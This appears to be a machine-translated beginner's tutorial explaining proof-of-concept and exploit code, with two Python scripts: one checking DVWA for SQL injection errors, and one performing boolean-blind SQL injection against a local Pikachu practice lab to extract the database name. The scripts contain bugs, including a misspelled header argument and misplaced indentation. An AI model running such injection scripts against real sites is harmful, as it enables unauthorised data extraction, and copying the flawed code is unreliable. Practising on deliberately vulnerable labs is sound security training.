Preface

I want to exercise my programming ability , Elder martial brother said it will be very important in the future , Better learn a little better

But I also want to learn about safety , Then practice poc Well

What is? POC

PoC( Full name : Proof of Concept), Proof of concept of Chinese translation . In the security world , You can understand it as a vulnerability verifier ( In this tutorial , If there is no special instruction , The default represents vulnerability verifier ), Of course, you have to force me to say that I'm wrong , I definitely support you , Anyway, I'm not going to refute you . Compared with some applications ,PoC Is an incomplete program , Just a piece of code to prove the proposer's point . Because it's some code snippets , So I haven't seen a book about how to write it until now PoC Of , Because these things are for people who can write code , They will be surprised why they have to publish a book when it will happen in minutes .

What is? Exp

Exp( Full name : Exploit), It is called vulnerability exploiter in Chinese . The name is very clear , In short , It is a program that can play the value of loopholes , It feels the same as not saying . Imagine a scene like this , There is a goal SQL Inject holes , Then you know , Then you write a program , Through this SQL Inject holes , Got the authority of the target , Then this program is called Exp 了 , Of course , If you don't use this vulnerability , It's just there , So this loophole , It can be considered worthless to you .

POC matters needing attention

1. Randomness Parameters are random ( Sometimes it's not random )
2. generality Set up websites with the same components , Not for individual websites
3. deterministic It is necessary to clearly verify whether the vulnerability exists

Try to write the first POC

dvwa Of sql Inject poc

This is to be on your own id Add ’

It can only be verified according to the returned results

import requests
import re

header = {
    "Cookie":""} 
url = input(" Please enter url")
r = requests.get(url.header)
res = str(r.content)
if re.search("syntax",res):
    print(" There is sql Inject ")
else:
    print(" non-existent sql Inject ")

pikachu sql Blind note poc

import requests
import string

url = "http://192.168.186.128/pikachu/vul/sqli/sqli_blind_b.php"
# Calculate the response packet length 
params={
    "name":"kobe","submit":" Inquire about "}
normalhtmllen = len(requests.get(url=url,params=params).text)
# url2=requests.get(url=url,params=params)
print("the len of HTML:",normalhtmllen)
# print(url2.url)
print("the len of HTML:"+str(normalhtmllen))
#+ I want to add the number str() Change to string 
#------------ Determine the length of the database name --------------------------------
dbNameLen = 0
while True:
    dbNameLen_url = url + "?name=kobe'+and+length(database())%3D"+str(dbNameLen)+"%23&submit= Inquire about "
    #print(dbNameLen_url)
    if len(requests.get(dbNameLen_url).text) == normalhtmllen:
        print("The len of dbName",dbNameLen)
        break
    if dbNameLen == 200:
        print("Error!")
        break
    dbNameLen += 1
#-----------------------------------------------------------------
#--- Use according to the obtained length substr（） Traverse the complete database name one by one from the beginning to the end ------
    dbName=""
    for i in range(1,9):
        for a in string.ascii_lowercase:
            dbName_url=url + "?name=kobe'+and+substr(database(),"+str(i)+",1)='"+a+"'%23&submit= Inquire about "
            #print(dbName_url)
            if len(requests.get(dbName_url).text) == normalhtmllen:
                dbName += a
                print(dbName)

Reference resources

https://mp.weixin.qq.com/s?__biz=MzIyNTA1NzAxOA==&mid=402630401&idx=1&sn=8739dae646ec90ff4c813b14ef7e961f
http://labs.supinfochina.com/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8poc/
https://blog.csdn.net/qq_37622608/article/details/88048847
https://www.cxyzjd.com/article/qqchaozai/103567861